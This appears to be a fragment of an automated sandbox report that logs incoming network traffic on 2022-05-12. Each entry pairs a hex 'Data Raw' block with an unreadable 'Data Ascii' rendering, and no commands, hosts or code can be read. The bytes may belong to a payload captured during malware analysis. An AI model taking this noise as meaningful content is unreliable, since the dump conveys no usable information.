                                                                                                                                  2022-05-12 17:41:27 UTC67INData Raw: 00 70 74 a8 00 13 9c fe a1 95 3b 16 1a f8 35 0d ca cf 3c c8 0c 21 8d 74 7b 85 4b f3 2e a3 32 18 ab b3 e5 e3 9d cd 00 f4 a9 06 17 03 d3 dc a9 ba 49 b2 09 df 35 58 49 42 b9 13 23 cd a0 8f f4 d0 aa fb a2 3c 45 31 04 38 9a 61 9c 28 45 8d 20 55 0a e9 a7 78 8d ed 32 49 0d 16 bb 36 83 94 e4 6e 2f 97 1d 31 37 66 ca 6c 9f a5 34 5f 99 3d 0b 1f ba 93 be a7 c4 e8 51 13 17 bc 4b db 42 4e fd b7 4d fb cb 3d a5 26 06 63 49 d1 f2 b1 55 1a 76 d4 55 5f c2 ef b8 67 81 9b e1 39 96 67 18 9a ed 20 bc a2 54 a0 a5 87 1b 6c 00 44 73 88 4b b1 c1 b1 28 b7 cc 72 25 86 bd 40 97 bb f6 a3 1d 56 17 55 42 87 57 8a be 65 86 a5 a3 f3 fe c6 b8 64 15 e4 6f b0 26 62 3c 71 9d 7c 2e 6c 8c bb f1 db bb f8 21 e0 41 79 de 8b 1a 44 44 ff b6 5f a7 73 ea 8e 77 91 0a 48 f8 30 ba 75 65 c5 5f b7 d1 c4 31
                                                                                                                                  Data Ascii: pt;5<!t{K.2I5XIB#<E18a(E Ux2I6n/17fl4_=QKBNM=&cIUvU_g9g TlDsK(r%@VUBWedo&b<q|.l!AyDD_swH0ue_1
                                                                                                                                  2022-05-12 17:41:27 UTC68INData Raw: aa 7d 16 8d 60 64 92 87 47 d9 23 e3 53 a0 80 df 48 3d fe 35 c8 9b 1a 48 05 7c 69 01 80 77 87 78 39 72 1a 38 4a 66 49 2d 7d b7 57 0d 02 0e 20 ff 75 41 66 1e be e0 5a f8 d4 3d 70 96 af e0 e5 bd 16 8b f9 d4 c9 63 c0 e1 da ad bf 8c 34 f0 66 09 60 b8 ed d3 de 5f c8 58 7e 2f 54 d0 50 3a 78 c7 92 92 f9 0c 16 4b c0 85 c3 1f 45 a3 2d d7 d0 d6 06 88 58 b8 ca 04 e2 c3 27 59 7d 50 bf f7 5f 91 bd ba 9a 56 00 8b 04 35 f6 31 05 06 6e f2 89 d3 ce d3 0b 27 5a 05 ef af 4e 9d 39 06 f0 7c 0b 32 78 41 79 eb 85 d5 4a 9e 8d 3f 4b f5 32 fc f4 25 0e be 51 cc a7 18 6f b3 6a 3a b8 19 e3 3b a5 bb 2e bb 65 de c0 1b 0c 03 e9 62 61 21 08 81 74 f1 fc 80 6b 70 c4 a6 6d f6 fe 70 f6 0b ae 4f a4 6e c7 b5 a9 75 14 5f 59 0c 23 1a e5 b7 2f 1e 67 c4 0d ca b5 9e 49 84 df 7d 60 16 7e df 58 ed eb
                                                                                                                                  Data Ascii: }`dG#SH=5H|iwx9r8JfI-}W uAfZ=pc4f`_X~/TP:xKE-X'Y}P_V51n'ZN9|2xAyJ?K2%Qoj:;.eba!tkpmpOnu_Y#/gI}`~X
                                                                                                                                  2022-05-12 17:41:27 UTC69INData Raw: 88 5c 9c 55 77 0d cf d3 03 90 b1 2e b1 29 72 55 92 43 8d 56 d1 51 66 86 a9 ba dd 0e c9 9d 46 e6 e4 69 90 35 6f 14 5e 8d 7c 24 b2 8c aa f8 ef 4e eb 3c ec 48 68 cf ae 1a b8 bb 5c a7 51 b0 0d f9 80 77 ec 0e 45 76 8d 8f db e5 6a a1 b1 ff ec da 35 69 9b db 5c 2f 47 b3 36 f5 0e 19 5d 9a 27 46 a7 e3 82 01 3a c2 38 0a 2c de 12 34 47 ef 5b 91 47 4a 6a 48 05 19 b0 f4 82 aa 1c cb b3 f7 92 45 b2 6c c7 a5 49 a4 f7 c6 75 d9 61 58 10 f5 2b e8 92 26 cf b2 8e 08 d3 46 83 d3 e5 c6 12 37 47 9c 8e af e3 c6 75 78 73 de 41 41 e0 c6 06 88 d9 8e e8 b8 aa 75 06 93 50 da 0e 3f 7f c6 ca 26 2e 2b f9 0a 03 db 10 9e e4 37 06 63 4e 0b 18 d7 43 26 8f 6b ea 28 14 42 7d a8 dd 18 e0 78 76 ef ef 16 f1 0a 22 23 1b f0 c1 b6 36 43 21 e3 5e 6f 28 26 eb cb c3 29 5e 1e 2e b8 de 4a b7 5b a2 b5 25
                                                                                                                                  Data Ascii: \Uw.)rUCVQfFi5o^|$N<Hh\QwEvj5i\/G6]'F:8,4G[GJjHElIuaX+&F7GuxsAAuP?&.+7cNC&k(B}xv"#6C!^o(&)^.J[%
                                                                                                                                  2022-05-12 17:41:27 UTC71INData Raw: 36 04 ab 56 23 be 1c 79 bb 7d e6 db 34 f2 3f af 8f 07 a3 bd ce c0 37 0e 73 5f fc 7f 33 7d 06 65 f5 e7 6d 70 4d db a5 19 ec ed 72 de 0b aa 59 50 7c ff a2 ad 70 01 41 36 19 3c e4 ee b3 37 34 62 f6 4d 2c 5b 7f 5e 82 f7 67 7a 26 71 f3 71 fe f5 84 51 69 e0 60 3a e8 af d4 1e 6e 34 b0 88 f8 4b d6 04 75 ab f0 c7 65 65 58 d5 9b a1 36 0d c8 d2 10 cc f9 1c 80 80 e5 4c 76 7f b6 21 e9 66 03 0b 71 13 be f0 0a df e0 29 ae 6e 9d 38 86 f9 f0 11 6a 64 88 fa 1d 9c fe 3d 9d 22 0f 0d 6b 24 1c d9 d6 28 c3 19 2d 99 67 7d d3 07 f3 2e a7 1a bf a8 85 eb 8c a9 c3 00 fe ba 1c 06 04 eb 7d a8 ba 49 e1 06 b0 00 54 49 48 aa 50 3d de b2 b8 71 d1 aa e6 b3 2f 55 23 9e 2b 92 2f 93 39 4d ab 88 56 0a 82 87 5b 8d e2 38 26 39 09 bb 3c 91 9d f5 67 40 de 17 31 3d 7b df 7a 8c 3b 04 66 98 32 0b 0e
                                                                                                                                  Data Ascii: 6V#y}4?7s_3}empMrYP|pA6<74bM,[^gz&qqQi`:n4KueeX6Lv!fq)n8jd="k$(-g}.}ITIHP=q/U#+/9MV[8&9<g@1={z;f2
                                                                                                                                  2022-05-12 17:41:27 UTC72INData Raw: a6 88 91 f7 7c 69 a6 7a 36 05 20 63 81 3f 24 2e 2b 0f 9e 25 f3 3b b6 c7 3d 0a 41 48 32 18 dd 97 0a 95 12 a3 33 3c 92 55 43 d6 30 7c 53 2b ea c7 33 d9 e7 29 0b 7b 9e e0 be 59 7a fd ed 71 40 6a 95 ea c1 c4 12 7c 26 2f b3 00 4a a3 7d 8b 1d 24 65 1e 50 15 78 0a e2 e9 96 51 6a 45 e4 ee a7 7a 26 9f e1 b4 29 c2 8f 62 e3 61 c7 17 ee f5 a7 c5 d8 4c 90 74 50 9b 44 05 8c d6 58 45 f5 33 fc 62 29 0e fc 28 5c ab a8 17 e4 d9 ca 91 6d 2d 04 ba 3a 13 8d 60 64 60 dc 73 e4 61 f7 52 aa 86 df e9 3e fe 39 79 b4 1e 36 58 6e 4f 14 8e 8d 93 50 2e 5a 4b 31 25 50 63 c0 76 92 7c 67 05 1d 0c de a1 36 c4 36 93 e1 2b 75 d9 15 5f 85 b1 fb 34 af 32 b0 e7 d9 d5 72 de 9f cd ac a3 a4 22 ec 62 21 df b9 ed d5 62 0e d4 14 7f 32 4f fb 4c 2a 6c e5 b3 83 ba 1d 0a 35 79 84 c3 04 20 a4 36 ff 1a dc
                                                                                                                                  Data Ascii: |iz6 c?$.+%;=AH23<UC0|S+3){Yzq@j|&/J}$ePxQjEz&)baLtPDXE3b)(\m-:`d`saR>9y6XnOP.ZK1%Pcv|g66+u_42r"b!b2OL*l5y 6
                                                                                                                                  2022-05-12 17:41:27 UTC73INData Raw: 79 84 ed e5 8a 1b 13 e3 ba 0b 2f 8f d2 dc a9 ab 47 e1 11 c8 5a 85 48 42 bf 50 3a dc ae 91 e4 ca c5 35 a3 3c 42 22 17 29 94 2f 84 31 2a 50 21 55 0c 97 bd 69 9c ca d3 49 0d 01 96 7e 93 87 cc 8f 2f eb 1f 1c 08 79 d8 44 7e 2f 3c 55 b4 04 78 24 bb 8e b8 b4 d1 f9 45 02 06 4a 02 da 42 5b ec a3 5c 44 ac 00 a4 29 00 72 5d dd e0 de 6b 00 46 d1 44 72 ea 59 bb c0 87 f4 b3 27 8a 49 ca 8b f9 45 53 d4 57 aa 7d a0 1d 44 2d 4e 5b 8d 5b a4 ef b7 50 b4 c6 aa 0d d8 ac 57 47 a2 38 a6 28 6f 2d 6b 29 72 a3 06 ad 4d 8f 85 a9 da e4 c6 b8 6e cb 95 69 90 5d 62 28 6d 8d 7c 2f 6c 8c 09 f1 8f b1 f9 3a e0 41 79 de 90 2a 9a 45 a9 51 5e b3 c6 ea 8e 67 e2 1f 54 fa 4d 25 71 14 88 5e b7 d4 f7 ea 30 68 a5 d8 5c 2f f5 f7 36 ef 32 0c 4d 87 2d 55 a2 fc 98 8f ee 70 60 01 0b 79 11 34 40 dc 48 98
                                                                                                                                  Data Ascii: y/GZHBP:5<B")/1*P!UiI~/yD~/<Ux$EJB[\D)r]kFDrY'IESW}D-N[[PWG8(o-k)rMni]b(m|/l:Ay*EQ^gTM%q^0h\/62M-Up`y4@H
                                                                                                                                  2022-05-12 17:41:27 UTC74INData Raw: 28 78 32 7f 27 56 41 42 39 90 7a 02 37 19 05 fc d8 38 e1 14 96 0b 2a 7f d2 2e 76 94 b6 dc ed a9 3f 47 8f c7 d5 72 c8 8e cd bb 65 95 30 f1 74 19 e6 ba ed d5 43 06 e0 91 7c 3c 54 d3 84 28 77 d3 a1 88 ce 66 0a 35 d7 93 4e 4f 53 b1 35 ec 03 c7 15 98 cb e4 57 15 f0 bf 19 49 7b 4c 20 aa 4e 9d aa 36 be be 0c 9c 94 0a f6 9f fb 07 6e f4 8b c3 ce dd 32 3e 41 9f cd 69 5e 9d 33 63 fb 65 1a 2c 04 58 69 e6 9b d5 10 9e 8d 3f 33 57 37 fc fe 37 06 bb 5b c9 a9 26 f2 e2 6a 30 d6 8b f0 2f bb 8a 17 96 db cf ec 3a 12 52 a4 61 61 26 6e 8b 73 f1 fd 92 62 74 cf 9b e0 e0 72 27 de 1a af ed bf 68 c7 b5 ae 4b 9d 41 27 17 36 32 25 9c 35 19 70 43 26 d3 a4 81 4b be e6 71 77 01 f8 a2 56 fc f4 26 ef 7f f4 65 5d d5 35 d4 14 6e 38 15 5b fb 4b d1 01 e8 bd e0 d1 4c d4 4f c1 b5 9b 27 1d d5 d2
                                                                                                                                  Data Ascii: (x2'VAB9z78*.v?Gre0tC|<T(wf5NOS5WI{L N6n2>Ai^3ce,Xi?3W77[&j0/:Raa&nsbtr'hKA'62%5pC&KqwV&e]5n8[KLO'
                                                                                                                                  2022-05-12 17:41:27 UTC76INData Raw: ec 41 a1 26 62 36 49 68 7c 2e 6c ff e2 f3 f8 92 f5 3c f5 2e 23 dd 90 20 4e 2b f8 b4 5f ad c8 ee 9f 62 f5 70 16 fa 3a ba 1c 40 97 5e bd c3 83 86 37 68 8d b4 01 2d 47 fd 25 f4 79 94 4f 87 27 57 ac 8c 24 a7 3a 7a 14 d7 23 c3 13 27 43 87 50 99 47 ec 78 4e 14 b2 a1 f1 bb 01 48 cb b5 92 c7 34 a7 64 a8 f0 41 bb e1 81 e0 d8 61 54 29 69 39 ed bc d7 ef b2 88 6d a5 7d 83 d9 80 b5 0c 30 52 ef 9b 7a e3 c0 6e 56 f8 d8 69 9d cb e5 00 e7 8d a4 8e b3 c5 20 6b a0 58 cb 01 08 bc ed 1e 20 41 7f d3 90 0a b4 49 b4 c7 3d 2e c9 67 32 1e b8 76 0b 93 6a e4 34 14 4d 7e a8 d1 5f 39 7a 76 ef 19 39 d9 27 28 0b 77 d9 ef bc 59 7a fd e3 45 62 28 3f ea cb c3 00 35 d9 d0 46 00 5c b4 5d ff 38 24 65 1f 7c 1f 69 1c b5 d0 98 4c 6b 2a b8 ee a7 40 fa 92 a5 a3 f1 cc 87 73 ea 6b fe 9a 59 96 5e 3b
                                                                                                                                  Data Ascii: A&b6Ih|.l<.# N+_bp:@^7h-G%yO'W$:z#'CPGxNH4dAaT)i9m}0RznVi kX AI=.g2vj4M~_9zv9'(wYzEb(?5F\]8$e|iLk*@skY^;
                                                                                                                                  2022-05-12 17:41:27 UTC77INData Raw: f1 35 92 71 61 10 8f f6 f7 eb 76 de 1a b3 4f ae 7c c8 91 bf 63 6d 40 27 1d 9a 1a ef 8e 46 0a 65 ce 2b d9 8c 6e 5b a8 f1 6b 1f 52 74 f3 5c f4 9a b0 fc 69 ea 7c 40 92 98 d6 14 6e 3f 31 86 eb 40 ef 02 64 ba e0 c0 41 d1 50 4f 8e 07 2e 0c db 95 82 cd f9 10 31 94 e4 5a 5e 60 e6 fb e9 66 02 09 65 2a 40 e5 2a 60 8f 1f ac f2 86 01 36 e1 6c 0a 68 7a b9 06 35 7d fe a1 86 1f 13 c7 23 35 0d ca c3 39 e0 fd 22 8d 72 14 9b 41 f3 24 85 95 18 ab 8f fe e9 8c cb 11 f1 81 ba 14 03 d4 b3 9f b8 49 fa 29 78 35 56 43 53 bf 6b e1 cc a0 86 e7 d7 bb e3 8a cd 47 31 02 57 ac 3c 94 22 6d 24 20 55 00 97 a7 69 8b ca 8a 4b 0d 0d aa 33 aa 66 e7 6e 29 c3 e6 32 37 6e a5 0d 9d 2f 36 77 6a 32 0b 15 92 7d be a7 cf c0 f6 13 17 2f 50 dd 53 5a d5 56 4d 57 c9 11 b9 38 0e 4b a8 cc f2 bb 79 12 6e 23
                                                                                                                                  Data Ascii: 5qavO|cm@'Fe+n[kRt\i|@n?1@dAPO.1Z^`fe*@*`6lhz5}#59"rA$I)x5VCSkG1W<"m$ UiK3fn)27n/6wj2}/PSZVMW8Kyn#
                                                                                                                                  2022-05-12 17:41:27 UTC78INData Raw: 0a fe 6f f5 32 87 96 7d b9 c1 23 68 43 28 ea c7 35 f1 1b 3a 15 83 f0 ed bb 50 63 2d fc 5d 7b 55 95 fb d9 d6 20 ac 27 03 b2 f6 4a a1 57 8c 12 21 7a 05 43 01 78 07 d2 f6 bc b2 6b 69 f5 ff af 62 27 87 ad b2 48 9c 8e 62 e4 65 d2 07 fc a9 b6 d7 c7 fa 6e 75 6d e2 40 17 9b 0a 41 53 94 7b ee 70 2d 37 05 36 4d 53 81 6a fa c8 c7 ae 0c 76 04 bc 54 21 80 71 61 a8 cd 6b 51 5d f8 3d 98 8b f7 cd 2d f4 2c b5 a7 0a 48 1e 7d 50 07 58 67 be 5e 39 7e 75 35 24 56 41 35 46 02 65 10 37 0d 0c c5 6d 27 f4 e0 bf cd 32 6e de 2b eb ad 10 f2 ea a9 22 b2 d6 c5 d5 78 c8 df b8 ac bf 86 3d f4 6c 33 df a9 ff ca 74 f0 c9 74 75 2d 5f ec 9a 38 7a ca 97 90 f4 1d 1b 27 ce a5 3d 14 7f bd 25 f7 18 b9 47 8f d4 ef d5 26 f0 c2 21 59 69 5b cd a7 73 9a ad a8 9a ed 02 8b 04 14 ed ff fe 06 7f e0 87 ef
                                                                                                                                  Data Ascii: o2}#hC(5:Pc-]{U 'JW!zCxkib'Hbenum@AS{p-76MSjvT!qakQ]=-,H}PXg^9~u5$VA5Fe7m'2n+"x=l3ttu-_8z'=%G&!Yi[s
                                                                                                                                  2022-05-12 17:41:27 UTC80INData Raw: 27 bc a2 3c 45 22 11 29 8f 28 82 b5 54 96 4f 6d 0b 84 a5 6b 81 f4 23 45 83 bc ac ec 91 82 f7 60 04 95 02 22 38 79 c6 7d 91 3e 30 4e 97 a8 1a 10 92 db bc a7 cf c0 07 11 17 2f 6b 21 43 5d fb d8 07 57 c3 37 07 38 09 74 9f df fd a0 5b 1e 59 e6 81 77 ce fe b6 d1 8d 8a fe bc aa b0 cc 9a ed 02 c1 d7 57 aa 8b f9 3a 6c 0a 66 a1 86 48 b7 a8 d3 50 b4 c6 d6 1c c5 ad 4e 0b 99 d2 b6 38 78 2c 7d 72 8d 5c f3 bd 49 95 be a3 f3 71 c4 b8 68 da e8 78 94 bc 4a 1a 70 8d 76 3d 66 9d b5 e6 2e 8b f6 24 f3 50 6f e1 e9 d5 b8 bb b2 bc 30 96 da ea 84 71 6f 45 4a f8 3b a3 66 0a 80 48 a8 d8 71 cb 20 07 bf da 5c 25 54 fc 20 ef 4a 97 f8 9f fd 55 b1 f0 92 9f e0 70 60 0b 32 c8 03 24 dc dc 6c 9c 47 ec 04 b8 05 b4 ba e5 98 c8 5b 51 9b 23 9b 36 a1 01 a3 ad 43 b1 fd 10 a3 86 4d 4a 29 64 39 f8
                                                                                                                                  Data Ascii: '<E")(TOmk#E`"8y}>0N/k!C]W78t[YwW:lfHPN8x,}r\IqhxJpv=f.$Po0qoEJ;fHq \%T JUp`2$lG[Q#6CMJ)d9
                                                                                                                                  2022-05-12 17:41:27 UTC81INData Raw: 38 8c ee d2 0f 61 d5 8c c3 87 c7 8f 0a f3 7b 21 d9 90 ff d1 52 08 d9 50 57 47 52 fb 4a 38 72 dc 98 90 e2 1d 0c 1d c5 80 c3 13 42 b9 1c 84 10 d6 00 9d d2 e0 e2 11 e7 d0 27 60 6d 42 33 a0 4e 99 94 d7 b2 af 06 98 09 6a c8 ed ec 00 7d fb 89 c3 ce d1 4c 73 5a 05 e3 96 56 8c 3f 63 de 65 1a 2c 06 5c 69 ec e0 c2 db 9d 8b 28 2d f2 27 f8 fe 30 7a ec 4b dd b9 36 6f ba 05 f7 d6 29 eb 2a a7 89 d5 ad 4b de e4 21 0d 44 11 9d 9e df a7 13 51 d9 d0 93 71 6b cd 84 85 e2 fc 76 d4 11 86 61 ae 7d d9 7f b8 65 2f 46 0d 1d 22 1b ff 9f 35 1f 67 c8 21 34 49 80 4d b5 f7 67 60 0d 44 f7 56 d5 f4 84 fe a9 e0 71 58 8e b8 d6 14 6e 26 15 d7 fb 4b d1 3f 4b bb e0 db 65 d8 5f d5 9b 2b 60 1e df fc 9e e1 f8 1a 28 b9 ec 5b 73 63 13 2d e9 66 08 0e 48 6a ad e6 20 4e c6 29 ae f8 9f 2c 80 e4 44 3b
                                                                                                                                  Data Ascii: 8a{!RPWGRJ8rB'`mB3Nj}LsZV?ce,\i(-'0zK6o)*K!DQqkva}e/F"5g!4IMg`DVqXn&K?Ke_+`([sc-fHj N),D;
                                                                                                                                  2022-05-12 17:41:27 UTC82INData Raw: 33 60 81 46 ed f1 e7 bb 81 2a 2c 46 54 32 89 0f 24 be d2 5c a3 0d f6 52 a6 b2 e4 c6 3e fe 22 a1 9c 3a 4c 0f 69 59 38 96 66 92 5a 3e 41 24 35 34 52 24 12 75 92 70 19 22 70 c1 d5 7f 32 d8 f1 be e1 2b 6e d1 3a 60 81 de ce e8 af 3e 8b e0 aa 18 73 de 95 e3 87 bd 86 24 ca 85 20 df be 82 9f 52 0e c2 37 42 3d 52 fd 74 ee 77 d5 b0 92 e0 35 29 31 d1 82 d5 3d 63 b1 34 f5 06 96 b4 8e d4 e9 cd 15 e7 bf 1e 4a 7b 4c 22 a0 30 5c bd ac b8 87 fa 8a 0e 1f e5 c4 dc 06 6e f8 8e f1 4d d4 23 32 5c 14 e1 e8 60 9f 39 06 f2 62 75 e7 16 55 72 c3 a4 ff da 9b a5 c3 25 da 36 93 b4 36 15 a5 62 74 be 30 78 a0 6d 21 d0 3d f7 13 9f 9e 03 b4 55 e1 d2 21 01 69 62 74 72 2b 68 0a 1b f6 fc 93 7b 72 d3 a5 d2 e6 f2 67 d5 75 5f 4e ae 77 c0 a9 ab 6b 13 6f 16 15 33 12 c7 c9 37 1f 6d e6 02 d3 a4 8a
                                                                                                                                  Data Ascii: 3`F*,FT2$\R>":LiY8fZ>A$54R$up"p2+n:`>s$ R7B=Rtw5)1=c4J{L"0\nM#2\`9buUr%66bt0xm!=U!ibtr+h{rgu_Nwko37m
                                                                                                                                  2022-05-12 17:41:27 UTC83INData Raw: a3 d2 38 6c 00 b1 5b 87 48 cd c6 99 50 bb cc 74 0d d4 bc 40 90 b3 28 b7 38 22 3a 55 42 b0 5d f9 ab fe 87 af a9 cd d0 c6 b8 6e cb e4 69 81 16 66 3c 31 8c 7c 2e af 8c bb e0 8b 8d fa 35 f7 4a 51 e7 94 2a 41 49 8b 8f 5b a7 dd e0 87 4e d8 1b 4a fe 12 4a 72 1b 93 76 d1 d7 ec d0 1d cf 87 db 56 3c 41 fe 1e 5f 42 19 49 af dd 47 a6 e5 aa c1 38 70 6a 23 84 c3 12 3e 55 f0 6d b0 b7 e9 6b 4e 2d 4e b1 f4 95 f1 2d c9 b3 f7 b1 91 a7 6e cd bc 44 bd c3 4f a2 d9 67 7a c2 6e 28 ee bc 68 ee b2 84 2a 5c 7f 83 d9 fc ef 1f 36 70 7a a7 7b e5 d0 57 60 e9 dd 4b 51 36 e4 17 8f fb 5c 8f b9 ac 69 41 90 52 da 0e 36 9b ef 41 0a 29 35 dd 4d a7 db 16 b6 d6 31 2e 93 67 32 1e c1 61 3a 93 6c ff 24 12 d6 0e 93 d6 30 7c 68 7e f8 cf 1d b8 08 28 0d 12 b0 c0 bc 5f 61 2b f2 52 07 7a 94 ea cd d8 32
                                                                                                                                  Data Ascii: 8l[HPt@(8":UB]nif<1|.5JQ*AI[NJJrvV<A_BIG8pj#>UmkN-N-nDOgzn(h*\6pz{W`KQ6\iAR6A)5M1.g2a:l$0|h~(_a+Rz2
                                                                                                                                  2022-05-12 17:41:27 UTC84INData Raw: 8f ec dc 8b 73 38 08 d9 27 ef f8 36 04 a9 55 d6 41 31 52 b1 41 35 ef 07 1e c4 50 b6 35 bf 43 c5 c4 06 07 7a 64 65 49 ce 78 06 7e 9e 35 92 71 6b f6 60 f7 f7 f4 19 16 1b ae 45 84 7d d3 ba 8a 67 05 dc 26 1d 22 dd ef 9f 24 6c 72 cc 21 d9 a8 a8 a2 a9 f7 61 6a 3e 70 f3 56 fa 9a b3 fc 69 ea 59 08 f9 ad d2 3c 26 28 3d 96 ec 24 ef 15 65 b0 c8 76 4d c0 51 de 43 17 02 35 f2 fa b6 c5 ea 1f 2a 9b dd 71 73 65 31 d3 b0 67 02 18 13 55 af e6 20 6b e7 01 ed f6 8c 2f b9 c2 6c 00 71 6f ac 11 19 b4 c5 a1 8c 39 3a 2d e6 31 25 88 d0 3c c2 1e 27 9c 72 68 a0 55 e0 22 86 29 09 a6 94 e1 79 8e c6 09 f3 b8 1c 3f 20 d2 dc a3 d5 12 f0 01 d5 24 5a 5e 94 aa 4f 3a c1 b1 8d 7a 67 98 3b 89 3e 4c 1b 0d 57 29 3f 94 22 56 8d 18 8c 0a 84 af 6a 83 ca 86 48 0d 01 a8 3e 93 9c cc 57 2f eb 1f 08 f3
                                                                                                                                  Data Ascii: s8'6UA1RA5P5CzdeIx~5qk`E}g&"$lr!aj>pViY<&(=$evMQC5*qse1gU k/lqo9:-1%<'rhU")y? $Z^O:zg;>LW)?"VjH>W/
                                                                                                                                  2022-05-12 17:41:27 UTC85INData Raw: 7f 50 e3 7f 50 5f db fc 17 91 c7 b2 99 34 f8 7f 69 a1 41 c0 15 3a 73 f9 82 37 34 09 49 90 00 d1 07 ac d1 a7 2a 62 77 2b 0e 4d 61 1b 93 6c ff 21 34 e2 71 a8 d7 2b 69 70 67 e3 d6 33 e0 01 47 c3 7c f1 cb d3 68 71 23 e9 42 40 29 97 ea c1 e1 6c 50 26 25 91 24 4b a5 51 e5 4b 24 65 14 3f 2e 79 16 c6 37 a7 64 47 45 e5 e4 b6 42 52 8f ad b4 3c cc 84 73 e8 6b f1 05 e5 c6 6f c4 d8 ee ff 45 40 e8 5b 11 a4 b2 50 43 81 4c ab 60 2d 2c 3f d3 5d ad 86 29 ad d9 cc b3 ee 11 05 bc 53 1a a1 60 6e b4 0c 56 dd 49 df 04 a4 8a f1 a8 08 fc 33 ad 98 4f 59 05 7e 4a 38 f0 62 92 56 47 44 18 32 2f 7e ec 2d 77 98 15 49 25 1f 0a 0a 36 1d c9 33 be e1 21 6c da 2c 7b 94 b7 e0 ef 87 62 9e e6 c3 ba 44 dc 9f c1 d8 b3 86 22 f9 10 e9 de b8 e7 fd 2c 0c c8 5e 57 c6 53 fb 4a 44 3d d5 b0 89 89 5c 0b
                                                                                                                                  Data Ascii: PP_4iA:s74I*bw+Mal!4q+ipg3G|hq#B@)lP&%$KQK$e?.y7dGEBR<skoE@[PCL`-,?])S`nVI3OY~J8bVGD2/~-wI%63!l,{bD",^WSJD=\
                                                                                                                                  2022-05-12 17:41:27 UTC87INData Raw: 23 8d 7e 57 c8 52 f4 36 21 63 18 ab 84 fb cb b9 c3 00 fe 85 4e 06 1a bd c8 a8 ba 43 d8 8e dc 35 50 26 6d bb 43 21 de 85 91 d1 c1 b3 ce b3 3c 44 3b 6b 08 98 3e 9e 0d 68 86 06 44 3b af a5 01 0a e2 32 48 7c 8c bb 36 83 87 c4 7f 3b f9 36 20 16 79 d4 7d bf 51 2d 5e 99 38 1d 0d a1 a6 01 a7 c5 ee dd 42 17 25 42 c8 4b 76 cd a6 59 45 e0 2c 84 38 18 1d 58 cd f2 bb 42 13 5d ff 95 66 c2 e9 34 91 81 9b f1 35 83 91 de bf c5 07 94 d5 5d b3 85 87 16 6c 00 44 86 8e 49 b1 c7 88 59 a2 40 25 0d c9 bd 56 b9 48 28 b7 32 52 3f 88 b6 8d 5c f9 ba 7c 97 a3 81 ce d1 c6 b2 46 da e4 69 90 35 78 2d 6a e2 68 2f 6c 86 93 61 fb 98 fe 5a d2 43 79 d5 83 37 56 59 b2 ac 77 b6 db ea 84 09 d2 1d 4a f2 1f 9d 76 3d 84 6f 9c df 95 5d 35 68 86 aa db 2f 47 f6 25 e2 50 05 67 1c 26 46 a0 cb 93 a7 3a
                                                                                                                                  Data Ascii: #~WR6!cNC5P&mC!<D;k>hD;2H|6;6 y}Q-^8B%BKvYE,8XB]f45]lDIY@%VH(2R?\|Fi5x-jh/laZCy7VYwJv=o]5h/G%Pg&F:
                                                                                                                                  2022-05-12 17:41:27 UTC88INData Raw: 90 00 d8 23 64 5e 33 be fc ba 41 28 72 10 21 37 47 5a 39 5f 0a 78 08 22 09 81 d3 7f 38 e0 0a aa f5 3c 57 48 3d 71 8f 97 e0 fb bb 1c f3 e2 c5 d3 64 53 98 cb ac be 92 36 f6 68 09 43 b8 ed df 74 1f c6 4f f2 3b 52 fb 4d 38 54 c4 93 95 f0 91 5b 35 d1 85 61 04 70 a5 1c c0 11 d6 0c ae 04 e9 ca 04 6f 81 21 48 7a 50 1b d4 5d 91 b6 80 b7 b9 13 9f 25 1a e4 ff f8 10 7f e0 8f 46 8e d4 23 33 73 fd e5 87 55 b5 da 0c e3 6e 09 0f 04 43 40 ab 8b fd da 8c 83 2e a9 dd 30 fc ff 25 36 be 69 cb ae 26 f2 e2 6a 30 d6 8b f0 18 bb b6 3c bf 43 c5 f3 10 8a 2b 6e 62 60 36 51 f1 74 f1 f7 aa 75 65 de 8e e7 f9 e9 fb d9 1a ae 4e bd 5f c2 83 ac 72 13 cd 76 1d 22 1b 4d 8e 17 0b 4f f1 20 d3 ae 9f 27 24 a6 67 61 17 62 db 25 fe f5 8e c7 bc e3 71 49 ec a3 c3 99 63 2c 3d 91 eb 6d c6 31 73 ab f6
                                                                                                                                  Data Ascii: #d^3A(r!7GZ9_x"8<WH=qdS6hCtO;RM8T[5apo!HzP]%F#3sUnC@.0%6i&j0<C+nb`6QtueN_rv"MO '$gab%qIc,=m1s
                                                                                                                                  2022-05-12 17:41:27 UTC89INData Raw: ab 56 81 af a9 d5 d0 c6 b8 6e cb e4 69 9a 26 62 3c 76 8d 7c 2e ff 8b bb f1 61 9f f8 35 e8 41 79 df 8d 2a 47 45 b8 86 5a a7 63 eb 8e 66 2e 1f 4a e9 12 4a 72 1b 93 55 c4 c0 ee da 3f 62 98 c1 74 fb 47 f7 3c ed 44 31 b5 86 27 40 aa cb 78 a6 3a 76 73 0f 32 c6 3a 5b 42 f4 6d b0 64 ea 6b 42 2d 8f b0 f4 99 f5 5b da b6 d5 f6 32 a7 68 ef 8c 43 bb e1 fd a4 f2 67 21 2d 6d 28 e2 be 26 16 b3 8e 04 e8 79 92 d6 c7 0d 0f 30 52 93 af 6d f0 ce 69 41 e0 53 f6 5c 12 f6 16 9b d9 9e 11 b9 aa 7f 78 a9 43 d0 95 36 25 60 1e 26 2e 30 d8 81 0a cc c0 27 d1 77 87 69 66 32 09 de 58 00 8b ba 64 24 0f e1 6c a1 c6 3a 63 ad e7 f7 f4 58 e0 03 39 01 62 fe 17 2d 4a 78 3d 6e 7b 68 47 94 f9 c7 d8 32 45 fc 38 6f 53 65 a5 57 8b 12 2f 74 17 41 19 62 c0 d1 e5 8e 5d 66 cb 52 c6 51 4a 26 89 bc bd 36
                                                                                                                                  Data Ascii: Vni&b<v|.a5Ay*GEZcf.JJrU?btG<D1'@x:vs2:[BmdkB-[2hCg!-m(&y0RmiAS\xC6%`&.0'wif2Xd$l:cX9b-Jx=n{hG2E8oSeW/tAb]fRQJ&6
